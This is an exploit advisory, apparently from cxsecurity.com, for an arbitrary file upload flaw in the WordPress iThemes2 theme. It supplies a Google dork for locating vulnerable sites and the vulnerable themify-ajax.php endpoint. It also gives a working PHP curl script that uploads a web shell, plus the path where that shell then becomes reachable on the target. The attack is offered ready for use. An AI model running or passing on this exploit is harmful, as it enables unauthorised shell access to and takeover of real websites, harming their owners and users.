WordPress iThemes2 Shell Upload

2013.11.21
Credit: DevilScreaM
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#Title : Wordpress iThemes2 Themes Arbitrary File Upload #Author : DevilScreaM #Date : 11/20/2013 - 20 November 2013 #Category : Web Applications #Type : PHP #Vendor : http://themify.me/ #Link : http://themify.me/themes/ithemes2 #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Tested : Mozila, Chrome, Opera -> Windows & Linux #Vulnerabillity : Arbitrary File Upload #Dork : inurl:wp-content/themes/ithemes2 Arbitrary File Upload Exploit : http://SITE-TARGET/wp-content/themes/ithemes2/themify/themify-ajax.php Script : <?php $uploadfile="devilscream.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/ithemes2/themify/themify-ajax.php?upload=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://SITE-TARGET/wp-content/themes/ithemes2/uploads/devilscream.php

References:

http://themify.me/themes/ithemes2


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top